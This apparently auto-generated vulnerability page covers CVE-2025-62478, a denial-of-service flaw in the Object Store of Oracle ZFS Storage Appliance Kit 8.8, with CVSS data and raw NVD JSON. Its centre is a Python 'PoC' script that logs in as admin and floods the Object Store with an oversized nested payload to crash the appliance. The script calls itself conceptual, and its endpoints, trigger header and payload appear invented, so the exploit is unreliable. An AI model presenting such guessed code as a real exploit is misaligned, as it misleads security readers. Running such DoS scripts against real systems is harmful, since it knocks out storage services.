Security Vulnerability Report
CVE-2025-62478 CVSS 4.9 MEDIUM

CVE-2025-62478

Published: 2025-10-21 20:20:54
Last Modified: 2025-10-23 16:01:53

Description

Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Object Store). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H
Weakness: CWE-400 (Uncontrolled Resource Consumption)

Configurations (Affected Products)

cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:* - VULNERABLE
Oracle ZFS Storage Appliance Kit 8.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-62478 - Oracle ZFS Storage Appliance Kit Object Store DoS PoC
# This is a conceptual PoC for a Denial of Service vulnerability
# in Oracle ZFS Storage Appliance Kit 8.8 Object Store component
# Requires high-privilege authentication credentials

import requests
import sys
import time

# Target configuration
TARGET_HOST = "https://target-zfs-appliance:215"
AUTH_USER = "admin"      # High-privilege account required
AUTH_PASS = "password"   # Valid credentials needed

# Object Store API endpoint
OBJECT_STORE_ENDPOINT = f"{TARGET_HOST}/api/object/v1"


def trigger_dos():
    """
    Send crafted HTTP requests to trigger the DoS vulnerability
    in the Object Store component.
    """
    session = requests.Session()

    # Step 1: Authenticate with high-privilege credentials
    auth_url = f"{TARGET_HOST}/api/auth/v1/login"
    auth_payload = {
        "username": AUTH_USER,
        "password": AUTH_PASS
    }
    try:
        auth_response = session.post(auth_url, json=auth_payload, verify=False)
        if auth_response.status_code != 200:
            print("[-] Authentication failed. High-privilege credentials required.")
            sys.exit(1)
        print("[+] Authentication successful.")
    except Exception as e:
        print(f"[-] Connection error: {e}")
        sys.exit(1)

    # Step 2: Send crafted request to Object Store to trigger DoS
    # The vulnerability is triggered by specific malformed object store requests
    headers = {
        "Content-Type": "application/json",
        "X-Object-Operation": "malicious-trigger"
    }

    # Crafted payload designed to cause resource exhaustion / crash
    payload = {
        "operation": "put",
        "bucket": "exploit-bucket",
        "object": "A" * 65536,
        "metadata": {
            "trigger": "dos-condition",
            "nested": [{"deep": "A" * 4096} for _ in range(1000)]
        }
    }

    print("[*] Sending crafted request to Object Store endpoint...")
    try:
        # Send the malicious request
        response = session.post(
            f"{OBJECT_STORE_ENDPOINT}/objects",
            json=payload,
            headers=headers,
            timeout=30
        )
        print(f"[*] Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[+] Target appears unresponsive - DoS may have been triggered!")
    except requests.exceptions.ConnectionError:
        print("[+] Connection refused - Target service has crashed!")
    except Exception as e:
        print(f"[*] Response: {e}")

    # Step 3: Verify the service is down
    time.sleep(5)
    try:
        check = session.get(f"{TARGET_HOST}/api/health/v1/status", timeout=10)
        print(f"[*] Service still responding: {check.status_code}")
    except Exception:
        print("[+] Service is DOWN - DoS confirmed!")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-62478 - Oracle ZFS Storage Appliance Kit DoS PoC")
    print("Component: Object Store | Version: 8.8")
    print("=" * 60)
    trigger_dos()
```

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory: Oracle Critical Patch Update, October 2025)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-62478",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-21T20:20:54.483",
    "lastModified": "2025-10-23T16:01:53.363",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Object Store). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-400"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*",
                "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.oracle.com/security-alerts/cpuoct2025.html",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```